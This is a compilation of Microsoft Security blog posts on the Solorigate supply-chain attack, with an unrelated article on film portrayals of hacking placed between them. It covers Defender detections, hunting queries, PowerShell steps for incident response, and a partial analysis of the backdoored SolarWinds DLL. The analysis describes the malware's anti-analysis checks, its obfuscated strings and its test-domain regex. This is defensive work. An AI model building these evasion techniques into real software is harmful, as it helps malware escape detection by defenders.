Like the rest of the security industry, Microsoft continues to track the Solorigate attack, an active threat that continues to unfold as well as evolve. As part of empowering our customers and the larger security community to respond to this attack through sharing intelligence and providing advice, this blog serves to guide Microsoft 365 customers to take full advantage of the comprehensive visibility and the rich investigation tools available in Microsoft 365 Defender. This blog shows that many of the existing capabilities in Microsoft 365 Defender help address this attack, but the unique scenarios created by the threat resulted in some Solorigate-specific detections and other innovative protections, including ones that are made possible by deeply integrated cross-domain threat defense.

For additional information and further guidance, refer to these Microsoft resources:

Microsoft will continue to provide public information about the patterns and techniques of this attack and related intelligence for customers to defend themselves, in addition to enhancing the protection capabilities of Microsoft security solutions.


Appendix: Additional details for detection and hunting

Detection details

Attack stage Microsoft 365 Defender detection or alert
Initial access Microsoft Defender for Endpoint:

  • ‘Solorigate’ high-severity malware was detected/blocked/prevented (Trojan:MSIL/Solorigate.BR!dha)
  • SolarWinds Malicious binaries associated with a supply chain attack
Execution and persistence Microsoft Defender for Endpoint:

Command and Control Microsoft Defender for Endpoint:

Defense evasion Microsoft Defender for Endpoint:

  • Suspicious audit policy tampering
Reconnaissance Microsoft Defender for Endpoint:

  • Masquerading Active Directory exploration tool
  • Suspicious sequence of exploration activities
  • Execution of suspicious known LDAP query fragments
Credential access Microsoft Defender for Endpoint:

  • Suspicious access to LSASS (credential access)
  • AD FS private key extraction attempt
  • Possible attempt to access ADFS key material
  • Suspicious ADFS adapter process created

Microsoft Defender for Identity:

  • Unusual addition of permissions to an OAuth app
  • Active Directory attributes Reconnaissance using LDAP

Microsoft Cloud App Security:

  • Unusual addition of credentials to an OAuth app
Lateral movement Microsoft Defender for Endpoint

  • Suspicious file creation initiated remotely (lateral movement)
  • Suspicious Remote WMI Execution (lateral movement)
Exfiltration Microsoft Defender for Endpoint

  • Suspicious mailbox export or access modification
  • Suspicious archive creation

Advanced hunting queries

Attack stage Query link in GitHub repo
General Microsoft Defender for Endpoint Threat and Vulnerability Management:

Initial access Microsoft Defender for Endpoint:

Execution Microsoft Defender for Endpoint:

| where InitiatingProcessFileName =~”Microsoft.IdentityServer.ServiceHost.exe”
| where FileName in~(“werfault.exe”, “csc.exe”)
| where ProcessCommandLine !contains (“nameId”)

Command and Control Microsoft Defender for Endpoint

Credential access Azure Active Directory (Microsoft Cloud App Security):

Exfiltration Exchange Online (Microsoft Cloud App Security):

The post Using Microsoft 365 Defender to protect against Solorigate appeared first on Microsoft Security.

Fact vs. Fiction: Film Industry’s Portrayal of Cybersecurity

Article by Beau Peters

The movie industry is infamous for its loose depictions of hacking and cybersecurity. Hollywood often gets a lot wrong about hacking and digital protections, but what does it get right?

The power of film in influencing the future of technology and the experts that create it is immense. Because of this, it is important to assess what the facts are versus movie fiction.  Here, we’ll explore the film industry’s portrayal of cybersecurity.

Cybersecurity in Movies
From WarGames to Blackhat, hacking and cybersecurity movies have glamorized the world of digital safety and the compromising of said safety. However, each Hollywood outing does so with varying levels of realism, typically embracing excitement over reality. 
In the 1983 WarGames movie, a young hacker almost triggers World War 3
These portrayals have led to common tropes and views of the cybersecurity industry in their attempts to prevent and combat hacking attempts. Among these tropes are some of the following portrayals, each occurring with varying degrees of absurdity.

1 Hacking is exciting, fast, and often ethical
The trope of a computer-savvy individual slamming on a keyboard for a few seconds and saying “I’m in” is common enough to be a defining joke about cybersecurity in film. Hacking is shown to be a process that takes minutes with has instant results. This is often far from reality, where hacking attempts can take weeks or even months to produce results.

And the results of actual digital break-ins are often far from ethical. Movies tend to show hacking as a victimless crime, but real-life hacking tends to mean data theft that can have severe implications on people’s lives.

2. There is a visually distinct or compelling element of hacking 
Hollywood has to keep an audience engaged. Because of this, hacking and cybersecurity are often paired with some visually striking element that would simply be ridiculous in reality.

Jurassic Park has a great scene exemplifying this trope. Under attack from a velociraptor, a child logs on to a computer and proceeds to navigate through a 3D maze representing the computer system’s files. In reality, typing in a few commands would have achieved a result faster. However, this wouldn’t have been as exciting.

3. Hacking and cybersecurity are defined by excessively fast typing
You always know a hacker or a computer systems expert by their excessively fast keyboard smashing. In movies and TV, computer experts are always clicking away at a keyboard at speeds few of us could match, speeds that would unlikely result in very productive work due to mistakes and time needed to assess the situation.

However, fast typing is a staple of hacking movies. The faster you type, the faster you can get in or defend a system.

When compared to the reality of cybersecurity systems, these Hollywood portrayals often come up short. Though some movies are getting better at portraying hacking and security, they rarely capture the grittier, less exciting truth. 

Cybersecurity in Reality
In reality, hacking is a much more time consuming and boring process, with results that have real impacts on the lives of everyday people. Hollywood neglects some of these finer points in favour of spectacle, as can be expected. Cybersecurity comes with its own set of tedious practices as well as the glamorous aspects of navigating computer systems.

Here are just a few ways that hacking and cybersecurity operate in the real world that movies tend to obscure or fail to depict:

1. Hacking is about information more than profit.
While cybercriminals can sometimes come away with a profit, doing so is incredibly difficult and not very common. Ransomware is sometimes used to extort profits from corporations, a process that occurs when a cybercriminal uses malware to hold a system hostage until a payment is made. However, break-ins usually result in little more than data theft or blockages with costly implications for businesses and individuals.

For example, Distributed Denial of Service (DDoS) attacks are used to slow or stop the computer processes of a business. This doesn’t necessarily result in any money for the hackers, but the downtime can cost companies thousands to millions of dollars.

2. Hackers rely heavily on phishing and social engineering.
Breaking into a system often requires access to valid user IDs and account passwords. This means hackers tend to use phishing and social engineering methods to mine information. They use all kinds of bots and scams to try and trick average individuals into clicking a link or divulging personal information.

However, this means that a lot of good can be done in the cybersecurity world without even needing to code. Simply teaching teams what to look for in avoiding scams and fraud can be a great way to approach cybersecurity incident management and keep private data safe.

3. White-hat hackers are real, and they make good money.
One thing movies get right sometimes is that hackers can be the good guys. There is a whole category of ethical hackers who often work as bounty hunters to find flaws in a company's cybersecurity systems. These so-called “white hat” hackers attempt to break in and are paid a bounty if they can reveal security deficiencies.

Sometimes, white-hat hacking comes with a significant paycheck. The bounty platform HackerOne has paid out $40 million across 2020 alone, making seven different hackers millionaires in a single year.

With the desperate need for individuals in the cybersecurity field, the truth around hacking is important to note. While Hollywood can make hacking seem glamorous and exciting, the truth is that many hacking processes come with dangerous implications. However, hacking can also be used to benefit the safety of information in ethical bounty situations.

With the emergence of cloud computing as a standard for remote workspaces, security professionals are needed now more than ever. Secure public and private cloud solutions are required for a functioning application marketplace, and cybersecurity professionals play a key role in maintaining that safety.

While cybersecurity isn’t always exciting, the results of keeping systems safe are much more rewarding than the black-hat alternatives.

The movie industry propagates a view of the cybersecurity field that is often far from reality. However, by acknowledging the departures from the truth, we get a better idea of the need and value of cybersecurity solutions as a whole, especially in the modern world of accelerated digital innovation.

While hacking and cybersecurity might not be anywhere near as exciting as they are in movies, working in cybersecurity—whether as a systems expert or a white-hat hacker—can mean a big paycheck and a safer world for the people you know and love. And that reality is better than any movie.

Advice for incident responders on recovery from systemic identity compromises

As Microsoft alongside our industry partners and the security community continues to investigate the extent of the Solorigate attack, our goal is to provide the latest threat intelligence including IOCs and guidance across our products and solutions to help the community fight back against, harden your infrastructure, and begin to recover from this attack of unprecedented scale. As new information becomes available, we will make updates to this article.

This blog will outline lessons learned from this and other incident response to date in on-premises and cloud environments. This latest guidance is for customers looking to re-establish trusted identities for credentials that are suspected of compromise by Solorigate malware.

This article is intended to give experienced incident responders some advice on techniques to consider when helping an organization respond to a suspected systemic identity compromise, like we’re seeing in some victims of the Solorigate malware, based on our experience in the field in similar scenarios. Re-establishing trust in the organization’s on-premises and cloud environments with minimal business impact requires in-depth investigation and an understanding of potential methods of persistence. While not meant to cover every possible scenario, this guidance is intended to summarize our experience with similar customer breaches and will be updated if we learn of new information that would help with successful recovery. Please review the resources referenced at the end of this article for additional information. This information is provided as-is and constitutes generalized guidance; the ultimate determination about how to apply this guidance to your IT environment and tenant(s) must consider your unique environment and needs, which each Customer is in the best position to determine.

The Solorigate investigation referenced in this guidance is ongoing at the time of publication and our teams continue to act as first responders to these attacks. As new information becomes available, we will make updates through our Microsoft Security Response Center (MSRC) blog.

Overview of the intrusion

As described in this Microsoft blog post, the hallmarks of this actor’s activity include, but are not limited to, the following techniques that are likely to result in systemic identity compromise:

  • An intrusion through malicious code in the SolarWinds Orion product. This results in the attacker gaining a foothold in the network, which the attacker can use to gain elevated credentials. Microsoft Defender now has detections for these files. Read our in-depth technical analysis of the Solorigate malware.
  • An intruder using administrative permissions (acquired through an on-premises compromise) to gain access to an organization’s trusted SAML token-signing certificate. This enables them to forge SAML tokens to impersonate any of the organization’s existing users and accounts, including highly privileged accounts.
  • Anomalous logins using the SAML tokens signed with a compromised token-signing certificate, which can be used against any on-premises resources (regardless of identity system or vendor) as well as against any cloud environment (regardless of vendor) because they have been configured to trust the certificate. An organization may miss the use of illegitimate SAML tokens because they are signed with a legitimate certificate.
  • The use of highly privileged accounts (acquired through the technique above or other means) to add illegitimate credentials to existing application service principals, enabling the attacker to call APIs with the permission assigned to that application.

Overview of response objectives

Organizations that have experienced systemic identity compromise need to start recovery by re-establishing trustworthy communications. This will enable effective triage and coordination of business operations recovery.

Many organizations have complex internal and external interdependencies. Core business processes and applications in an organization are likely to be temporarily impacted during recovery efforts until trust within your environment is re-established. Microsoft recommends that Incident Responders establish secure communications with key organizational personnel as the first step toward organizational recovery. If your investigation indicates that the attacker has used techniques outside of identity compromise at lower levels of your organizations’ infrastructure, such as hardware or firmware attacks, you will need to address those threats to reduce the risk of re-compromise.

Response objectives in approximate order:

  1. Establish secure communications for personnel key to the investigation and response effort.
  2. Investigate the environment for persistence and initial access point, while establishing continuous monitoring operations during recovery efforts.
  3. Regain and retain administrative control of your environment and remediate or block possible persistence techniques and initial access exploits.
  4. Improve posture by enabling security features and capabilities following best practice recommendations.

We recommend that incident responders review and digest the entirety of this guidance before taking action, as the specific order of actions taken to achieve the response objectives is very situational and depends heavily on the results (and completeness) of investigation and the business constraints of the specific organization. The following sections describe the incident Response techniques we recommend you consider for each of the above objectives.

Establish secure communications and productivity

Successful response requires being able to communicate without the attacker eavesdropping on your communications. Until you have achieved assurance in the privacy of your communications on your current infrastructure, use completely isolated identities and communication resources to coordinate your response and discuss topics that could potentially tip off the attacker to your investigation. Until your investigation has achieved assurance in actor eviction, we strongly recommend that you keep all incident-related comms isolated to enable you to have the element of surprise when taking remediation actions.

  • Initial one-on-one and group communications can be achieved through phone (PSTN) calling, conference bridges not connected to the corporate infrastructure, and end-to-end encrypted messaging solutions.
  • One way that many customers have established secure productivity and collaboration is to create a new Office 365 tenant which is completely isolated from the organization’s production tenant and create accounts only for the key personnel needed, and any incident response vendors or partners who need to be part of the response.
    • Make sure to follow best practices for securing this tenant, especially administrative accounts and rights by default. The new tenant should be limited on Administrative rights along with no trusts with outside applications or vendors. If you need further assistance or want information on hardening Microsoft 365, you can review the guidance here.

Investigate your environment

Once your incident responders and key personnel have a secure place to collaborate, the next step is to investigate the suspected compromised environment. Successful investigation will be a balance between getting to the bottom of every anomalous behavior to fully scope the extent of attacker activity and persistence and taking action quickly to stop any further activity on objectives by the attacker. Successful remediation requires as complete an understanding of the initial method of entry and persistence mechanisms controlled by the attacker as possible. Any persistence mechanisms missed could result in continued access by the attacker and potential for re-compromise.

  • Investigate and review cloud environment logs for suspicious actions and attacker IOCs, including:
    • Unified Audit Logs (UAL).
    • Azure Active Directory (Azure AD) logs.
    • Active Directory logs.
    • Exchange on-prem logs.
    • VPN logs.
    • Engineering systems logging.
    • Antivirus and endpoint detection logging.
  • Review endpoint audit logs for changes from on-premises for actions including, but not limited to, the following:
    • Group membership changes.
    • New user account creation.
    • Delegations within Active Directory.
    • Along with other typical signs of compromise or activity.
  • Review Administrative rights in your environments
    • Review privileged access in the cloud and remove any unnecessary permissions. Implement Privileged Identity Management (PIM); setup Conditional Access policies to limit administrative access during hardening.
    • Review privileged access on-premise and remove unnecessary permissions. Reduce membership of built-in groups, verify Active Directory delegations, harden Tier 0 environment, and limit who has access to Tier 0 assets.
    • Review all Enterprise Applications for delegated permissions and consent grants that allow (sample script to assist):
      • Modification of privileged users and roles.
      • Reading or accessing all mailboxes.
      • Sending or forwarding email on behalf of other users.
      • Accessing all OneDrive or SharePoint sites content.
      • Adding service principals that can read/write to the Directory.
    • Review access and configuration settings for the following Office 365 products:
      • SharePoint Online Sharing
      • Teams
      • PowerApps
      • OneDrive for Business
    • Review user accounts
      • Review and remove guest users that are no longer needed.
      • Review email configurations using Hawk or something similar.
        • Delegates
        • Mailbox folder permissions
        • ActiveSync mobile device registrations
        • Inbox Rules
        • Outlook on the Web Options
      • Validate that both MFA and self-service password reset (SSPR) contact information for all users is correct.

You may find that one or more of the logging sources above are data sources that the organization does not currently include in its security program. Some of them, especially the logging available in the cloud, are available only if configured and we recommend that you configure them as soon as possible to enable both the detections in the next section and forensics review of logs going forward. Make sure to configure your log retention to support your organization’s investigation goals going forward and retain evidence, if needed for legal, regulatory, or insurance purposes.

Establish continuous monitoring

There are many ways to detect activity associated with this campaign. Exactly how your organization will detect attacker behavior depends on which security tools you have available, or choose to deploy in response. Microsoft has provided examples publicly for some of the core security products and services that we offer and are continually updating those documents as new threat intelligence is identified related to this attacker. If you use other vendor’s products, review your vendor’s recommendations, and review the Microsoft documentation below to understand the detection techniques if you need to implement analogous detections in your environment on your own.

For readers using Azure Sentinel in their environments, review SolarWinds Post-Compromise Hunting guidance.

For readers using Microsoft Defender for Endpoint, review our guidance here, and review Microsoft Defender Antivirus guidance.

Azure Active Directory sign-ins

You can view this information from the Azure Active Directory Sign-in blade by selecting an appropriate time window and then downloading the report as either a CSV or JSON file. NOTE: You can download interactive, as well as non-interactive, sign-in reports via this interface. Once you have downloaded the results, look for the value “MFA requirement satisfied by claim in the token” in the “MFA result” field.

You can also use the Get-AzureADAuditSignInLogs cmdlet (see the details here) and filter the results to only return entries that match this field value, as seen in this example:

Get-AzureADAuditSignInLogs -All:$true -Filter "createdDateTime gt <startdate> and createdDateTime lt <enddate>"  | where {$_.Status.AdditionalDetails -eq "MFA requirement satisfied by claim in the token"} | select-object CreatedDateTime, IpAddress,UserAgent, ResourceDisplayName, CorrelationId, RequestId, UserPrincipalName -ExpandProperty Status

If your ADFS environment is configured to send a claim for MFA being satisfied, this may not be a strong signal. However, for many organizations using ADFS, and this claim is not included per your configuration; in those cases, the presence of this claim may be a strong indicator of attacker activity. You may also wish to add additional filters or conditions in the where clause to further improve your signal to noise ratio, such as only surfacing results from domains that are federated.

If suspicious sign-ins are detected, you can further pivot your investigation based on IP addresses identified, user accounts identified, and/or other indicators such as the UserAgent string and client operating system observed, if based on your knowledge of your environment these appear to be strong indicators.

Analysis of risky sign-in events

In some cases, Azure Active Directory and its Identity Protection platform will generate risk events associated with the use of attacker generated SAML tokens. These can be labeled as “unfamiliar properties”, “anonymous IP address”, “impossible travel” and the other risk events as described here.

Closely analyze all risk events associated with accounts that have administrative privileges. It is also important to analyze events that have been dismissed or remediated as some of these actions are done automatically. For example, a risk event for an anonymous IP address can be automatically remediated because the user passed MFA.

Detection of domain authentication properties

The attacker may attempt to manipulate the domain authentication policies which are recorded in the Azure Active Directory Audit Logs and reflected in the Unified Audit Log. An attacker who has gained access with Global Administrator privileges can modify the domains that are federated and/or trusted. Review any events associated with “Set domain authentication” in either the Unified Audit Log, Azure AD Audit Logs, and/or your SIEM environment. Verify that all activities were expected and planned.

The sample command below returns the entries from the Unified Audit Log which were associated with manipulation of domain authentication settings.

Search-UnifiedAuditLog -StartDate <startdate> -EndDate <enddate> -ResultSize 5000 -Operations "Set domain authentication"

Detection of credentials to a service principal associated with an OAuth application

If the attacker has gained control of a credential with sufficient privileges, the attack pattern includes locating an application that has been granted the ability to access any user’s e-mail in the organization and adding attacker controlled credentials to that application. In some cases, the attacker has modified these applications granting them additional rights such as access to all e-mail in the organization.

The following are operations that would be consistent with attacker behavior:

  • Add service principal credentials.
  • Update application- certificates and secrets management.
  • Update service principal.
  • Add app role assignment to service principal.
  • Add app role assignment grant to user.
  • Add OAuth2PermissionGrant.

Detection e-mail access by applications

Detection of access to e-mail by applications can be achieved using the Advanced Auditing capabilities of Office 365. Access to messages inside of Office 365 is audited via the MailItemsAccessed capability.

Analyze events in the Unified Audit Log for the Operation of MailItemsAccessed.

Detection of non-interactive sign-ins to service principals

Azure Active Directory in the Sign-In reports provides reporting of non-interactive sign-ins using credentials issued to service principals (as was observed in this attack). Analyzing the sign-ins for service principals reports can provide valuable data such as the IP Address the attacker was using to access the applications for e-mail access.

If there is evidence found that uncovers administrative permissions acquired through the on-premises compromise to gain access to your organization’s global administrator account and/or trusted SAML token signing certificate, Microsoft recommends taking the following immediate actions:

Remediate and retain administrative control

Regaining and retaining administrative control of your environment

If your investigation has identified that the attacker has administrative control in the organization’s cloud environment and/or on-prem, it’s critical to regain control in such a way as to ensure that the attacker isn’t persistent. Exactly which steps you will take depend both on what persistence you discovered in your investigation, and your level of confidence in the completeness of that investigation and discovery of all possible methods of entry and persistence. While it is possible to regain control with high confidence, even in the face of an incomplete investigation, doing so requires significant impact to business operations, so most organizations choose to remediate based on the results of the investigation in our experience.

We recommend you consider the following steps when building your administrative control recovery plan, but the exact order and timing should be planned based on the results of your investigation and understanding of adversary owned administrative assets and methods of persistence.

  • Ensure that any actions described here are performed from a trusted device built from a clean source, such as a privileged access workstation.
  • If the organization has lost control of its token signing certificates or federated trust the highest assurance approach is to remove trust and switch to cloud mastered identity while remediating on-prem. A detailed plan for doing so is beyond the scope of this document and requires careful planning and understanding of the business operations impacts of isolating identity. Review the Azure Active Directory guidance or key considerations.
  • Should your organization choose not to break trust while recovering administrative control on-prem, you’ll need to rotate your SAML token signing certificate once you have regained administrative control on-prem and blocked the attacker’s ability to access the signing certificate again. It’s critical that your organization follow the certificate rotation instructions below to ensure that the attacker doesn’t maintain the ability to forge tokens for your domain.

Rotation of ADFS token signing certificate

For a compromised or potentially compromised ADFS Token Signing certificate, rotating the Token Signing certificate a single time would still allow the previous Token Signing certificate to work. The rationale for this is to permit a grace period to update your Relying Party Trusts prior to expiration of the certificate during normal rotation of the signing certificate.

NOTE: Conducting the below steps in the ADFS environment will create both a primary and secondary certificate and will automatically promote the secondary certificate to primary after a default period of five days. If you have Relying Party trusts, this could cause impacts five days after the initial ADFS environment change and should be accounted for within your process. You can resolve this by replacing the primary certificate a third time with “-Urgent” and removing the secondary certificate or turning off automatic certificate rotation.

If instead of rolling the Token Signing Certificate your organization feels the need to replace the ADFS servers with known clean systems, you can follow steps to remove the existing ADFS from your environment and build a new one.

Delete Azure AD Cloud Provisioning agent configuration.

Should your organization decide to rotate the certificate on your current ADFS servers, follow these steps in the below order, from the ADFS server:

  1. Check to make sure that your AutoCertificateRollover is set to True.
    Get-AdfsProperties | FL AutoCert*, Certificate*
    • If it is not, you can set it with this command:
      Set-ADFSProperties -AutoCertificateRollover $true
  2. Connect to the Microsoft Online Service
  3. Document both your on-premise and cloud Token Signing Certificate thumbprint and expiration dates.
    Get-MsolFederationProperty -DomainName <domain>
  4. Replace the primary Token Signing certificate using the -Urgent switch to cause ADFS to replace the primary certificate immediately without making it a Secondary certificate.
    Update-AdfsCertificate -CertificateType Token-Signing -Urgent
  5. Create a secondary Token Signing certificate without using the -Urgent switch to allow for two on-premise Token Signing certificates, before syncing with Azure cloud.
    Update-AdfsCertificate -CertificateType Token-Signing
  6. Update the cloud environment with both the primary and secondary certificates on-premise to immediately remove the cloud published token signing certificate. If this step is not completed using this method you leave the potential for the old token signing certificate to still authenticate users.
    Update-MsolFederatedDomain -DomainName <domain>
  7. Verification that you completed the above steps and removed the certificate that was displayed in Step 3 above.
    Get-MsolFederationProperty -DomainName <domain>
  8. Revoke refresh tokens via PowerShell, information can be found here and you can also reference how to “Revoke user access in Azure Active Directory.”
    • Note: This will log users out of their phone, current webmail sessions, along with other items that are using Tokens and Refresh Tokens.

Additional cloud remediation activities to complete

  • Reset passwords on any break-glass accounts and reduce the number of break-glass accounts to the absolute minimum required.
  • We recommend that service and user accounts with Privileged access should be Cloud Only accounts and not use on-premise accounts synced or federated to Azure Active Directory.
  • Enforce Multi-Factor Authentication (MFA) across all elevated users in the tenant. We recommend enforcing MFA across all users in the tenant.
  • Implement Privileged Identity Management (PIM) and conditional access to limit administrative access.
    • For Office 365 users, implement Privileged Access Management (PAM) to limit access to sensitive capabilities (including eDiscovery, Global Admin, Account Administration, and more).
  • Review and reduce all Enterprise Applications delegated permissions or consent grants that allow such as:
    • Modification of privileged users and roles.
    • Reading, sending email, or accessing all mailboxes.
    • Accessing OneDrive, Teams, or SharePoint content.
    • Adding of Service Principals that can read/write to the Directory.
    • Application Permissions versus Delegated Access.

Additional on-premises remediation activities to complete

  • Rebuild systems that were identified as compromised by the attacker during your investigation.
  • Remove unnecessary members from Domain Admins, Backup Operators, and Enterprise Admin groups. Reference Microsoft’s Securing Privileged Access.
  • Reset passwords of all privileged accounts in the environment.
    • Privilege accounts are not limited to Built-In groups but can also be groups that are delegated access to Server Administration / Workstation Administration and other aspects of your environment.
  • Reset the krbtgt account using this script twice.
    • Note: If you are using Read-Only Domain Controllers, you will need to run the script for Read-Write Domain Controllers and Read-Only Domain Controllers.
  • After you validate that no persistence mechanisms created by the attacker exist or remain on your system, schedule a restart. This can assist with removing memory resident malware.
  • Reset each domain controller’s DSRM (Directory Services Restore Mode) password to something unique and complex.

Remediate or block persistence discovered during investigation

Remediate the persistence techniques identified in your investigation stage earlier. Investigation is an iterative process and you’ll need to balance the organizational desire to remediate as you identify anomalies and the chance that remediation will alert the attacker of your detection and cause them to react by changing techniques or creating additional persistence. For Office 365 accounts, automatically remediate known persistence techniques, if any are discovered, using the scripts described

Remediate user and service account access

Some of the user-level actions we recommend were described above already, specifically in terms of ensuring that MFA is enabled and running specific remediation scripts to clean up known persistence techniques. Here are some additional steps you should consider taking to remediate and restore user accounts:

  • Enforce conditional access based on trusted device.
    • If possible, enforce location-based conditional access that suits your organizational requirements.
  • For any user accounts suspected of being compromised, immediately reset passwords after eviction; make sure you also implement a mid-term plan to reset credentials for all accounts in your directory.
  • After credential rotation, use PowerShell to revoke refresh tokens immediately. More information can be found here and additional resources can be found at Revoke user access in an emergency in Azure Active Directory | Microsoft Docs.

Improve security posture

After a security event is a good time for organizations to reflect on their security strategy and priorities. Incident Responders are often asked to provide recommendations after an event on what investments the organization should prioritize now that it’s been faced with new threats. In addition to the recommendations documented earlier, we recommend you consider these areas of focus for your post-incident review recommendations that are responsive to the post-exploitation techniques used by this attacker and the common security posture gaps that enable them.

General security posture

  • Review Microsoft Secure Score for security fundamentals recommendations customized for the Microsoft products and services you consume.
  • Ensure that your organization has EDR and SIEM solutions in place.
  • Review Microsoft’s Enterprise access model.


  1. Review Five steps to securing your identity infrastructure and prioritize steps as appropriate for your Identity architecture.
  2. Consider migrating to Azure AD Security Defaults for your authentication policy- details can be found here.
  3. Eliminate your organization’s use of legacy authentication, if systems or applications still require it- review the guidance here.
    • As announced last year, the Exchange Team is planning to disable Basic Authentication for the EAS, EWS, POP, IMAP, and RPS protocols in the second half of 2021. As a point of clarity, Security Defaults and Authentication Policies are separate but provide complementary features. We recommend that customers use Authentication Policies to turn off Basic Authentication for a subset of Exchange Online protocols or to gradually turn off Basic Authentication across a large organization. While more details will come in future announcements, as mentioned in April, we plan to begin disabling Basic Authentication in existing tenants with no recorded usage as early as October 2020. We will provide notifications via Message Center posts before we disable Basic Authentication for any tenant.
  4. In order to help protect your ADFS/Azure AD Connect systems, beyond the ADFS guidance located, we recommend that you consider the following actions:
    • Treat your ADFS infrastructure and AD Connect infrastructure as a Tier 0 asset.
    • Restrict local administrative access to the system, including the account that is used to run the ADFS service.
      • The least privilege necessary for the account running ADFS is the Log on as a Service User Right Assignment.
    • Restrict administrative access to limited users and from limited IP address ranges by leveraging Windows Firewall policies for Remote Desktop.
      • It is recommended to set up a Tier 0 jump box or equivalent system.
    • Block all inbound SMB access to the systems from anywhere in the environment. See this resource for further details.
      • Get the Windows Firewall logs to a SIEM for historical and proactive monitoring.
    • If you are using a Service Account and your environment supports it, migrate from a Service Account to a group Managed Service Account (gMSA). If you cannot move to a gMSA, rotate the password on the Service Account to a complex password.
    • Ensure Verbose logging is enabled on your ADFS systems by executing the following commands:
Set-AdfsProperties -AuditLevel verbose
Restart-Service -Name adfssrv
Auditpol.exe /set /subcategory:”Application Generated” /failure:enable /success:enable

Contributors: We thank the team at FireEye for their contributions and review.

The post Advice for incident responders on recovery from systemic identity compromises appeared first on Microsoft Security.

Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers

We, along with the security industry and our partners, continue to investigate the extent of the Solorigate attack. While investigations are underway, we want to provide the defender community with intelligence to understand the scope, impact, remediation guidance, and product detections and protections we have built in as a result. We have established a resource center that is constantly updated as more information becomes available at

While the full extent of the compromise is still being investigated by the security industry as a whole, in this blog we are sharing insights into the compromised SolarWinds Orion Platform DLL that led to this sophisticated attack. The addition of a few benign-looking lines of code into a single DLL file spelled a serious threat to organizations using the affected product, a widely used IT administration software used across verticals, including government and the security industry. The discreet malicious codes inserted into the DLL called a backdoor composed of almost 4,000 lines of code that allowed the threat actor behind the attack to operate unfettered in compromised networks.

The fact that the compromised file is digitally signed suggests the attackers were able to access the company’s software development or distribution pipeline. Evidence suggests that as early as October 2019, these attackers have been testing their ability to insert code by adding empty classes. Therefore, insertion of malicious code into the SolarWinds.Orion.Core.BusinessLayer.dll likely occurred at an early stage, before the final stages of the software build, which would include digitally signing the compiled code. As a result, the DLL containing the malicious code is also digitally signed, which enhances its ability to run privileged actions—and keep a low profile.

In many of their actions, the attackers took steps to maintain a low profile. For example, the inserted malicious code is lightweight and only has the task of running a malware-added method in a parallel thread such that the DLL’s normal operations are not altered or interrupted. This method is part of a class, which the attackers named OrionImprovementBusinessLayer to blend in with the rest of the code. The class contains all the backdoor capabilities, comprising 13 subclasses and 16 methods, with strings obfuscated to further hide malicious code.

Once loaded, the backdoor goes through an extensive list of checks to make sure it’s running in an actual enterprise network and not on an analyst’s machines. It then contacts a command-and-control (C2) server using a subdomain generated partly from information gathered from the affected device, which means a unique subdomain for each affected domain. This is another way the attackers try to evade detection.

With a lengthy list of functions and capabilities, this backdoor allows hands-on-keyboard attackers to perform a wide range of actions. As we’ve seen in past human-operated attacks, once operating inside a network, adversaries can perform reconnaissance on the network, elevate privileges, and move laterally. Attackers progressively move across the network until they can achieve their goal, whether that’s cyberespionage or financial gain.


Solorigate attack chain diagram

Figure 1. Solorigate malware infection chain

The challenge in detecting these kinds of attacks means organizations should focus on solutions that can look at different facets of network operations to detect ongoing attacks already inside the network, in addition to strong preventative protection.

We have previously provided guidance and remediation steps to help ensure that customers are empowered to address this threat. In this blog, we’ll share our in-depth analysis of the backdoor’s behavior and functions, and show why it represents a high risk for business environments. We’ll also share details of the comprehensive endpoint protection provided by Microsoft Defender for Endpoint. In another blog, we discuss protections across the broader Microsoft 365 Defender, which integrates signals from endpoints with other domains – identities, data, cloud – to provide coordinated detection, investigation, and remediation capabilities. Read: Using Microsoft 365 Defender to protect against Solorigate.

Where it all starts: A poisoned code library

The attackers inserted malicious code into SolarWinds.Orion.Core.BusinessLayer.dll, a code library belonging to the SolarWinds Orion Platform. The attackers had to find a suitable place in this DLL component to insert their code. Ideally, they would choose a place in a method that gets invoked periodically, ensuring both execution and persistence, so that the malicious code is guaranteed to be always up and running. Such a suitable location turns out to be a method named RefreshInternal.

Screenshot of code of DLL with inserted code

Figure 2: The method infected with the bootstrapper for the backdoor

Screenshot of original code of DLL

Figure 3: What the original method looks like

The modification to this function is very lightweight and could be easily overlooked—all it does is to execute the method OrionImprovementBusinessLayer.Initialize within a parallel thread, so that the normal execution flow of RefreshInternal is not altered.

Why was this method chosen rather than other ones? A quick look at the architecture of this DLL shows that RefreshInternal is part of the class SolarWinds.Orion.Core.BusinessLayer.BackgroundInventory.InventoryManager and is invoked by a sequence of methods that can be traced back to the CoreBusinessLayerPlugin class. The purpose of this class, which initiates its execution with a method named Start (likely at an early stage when the DLL is loaded), is to initialize various other components and schedule the execution of several tasks. Among those tasks is Background Inventory, which ultimately starts the malicious code.

Screenshot of DLL execution flow showing inserted code running within a parallel thread

Figure 4. The inserted malicious code runs within a parallel thread

The functionality of the backdoor resides entirely in the class OrionImprovementBusinessLayer, comprising 13 subclasses and 16 methods. Its name blends in with the rest of the legitimate code. The threat actors were savvy enough to avoid give-away terminology like “backdoor”, “keylogger”, etc., and instead opted for a more neutral jargon. At first glance, the code in this DLL looks normal and doesn’t raise suspicions, which could be part of the reason why the insertion of malicious code was undetected for months, especially if the code for this DLL was not frequently updated.

To have some minimal form of obfuscation from prying eyes, the strings in the backdoor are compressed and encoded in Base64, or their hashes are used instead.

Screenshot of malware code with obfuscated strings

Figure 5: Example of obfuscated strings

Initial reconnaissance

The Initialize method is the de facto execution entry point of the backdoor. It carries out several checks to verify that it is running in a real victim’s environment:

  • It verifies that the process hosting the malicious DLL is named solarwinds.businesslayerhost.exe
  • It checks that the last write-time of the malicious DLL is at least 12 to 14 days earlier
  • It delays execution by random amounts of time
  • It verifies that the domain name of the current device meets the following conditions:
    • The domain must not contain certain strings; the check for these strings is implemented via hashes, so at this time the domain names that are block-listed are unknown
    • The domain must not contain “solarwinds”
    • The domain must not match the regular expression (?i)([^a-z]|^)(test)([^a-z]|$), or in simpler terms, it must not look like a test domain
  • It checks that there are no running processes related to security-related software (e.g., Windbg, Autoruns, Wireshark)
  • It checks that there are no drivers loaded from security-related software (e.g., groundling32.sys)
  • It checks that the status of certain services belonging to security-related software meets certain conditions (e.g., windefend, sense, cavp)
  • It checks that the host “” resolves to an expected IP address

If any of these checks fail, the backdoor terminates. All these inspections are carried out to avoid exposing the malicious functionality to unwanted environments, such as test networks or machines belonging to SolarWinds.

The backdoor

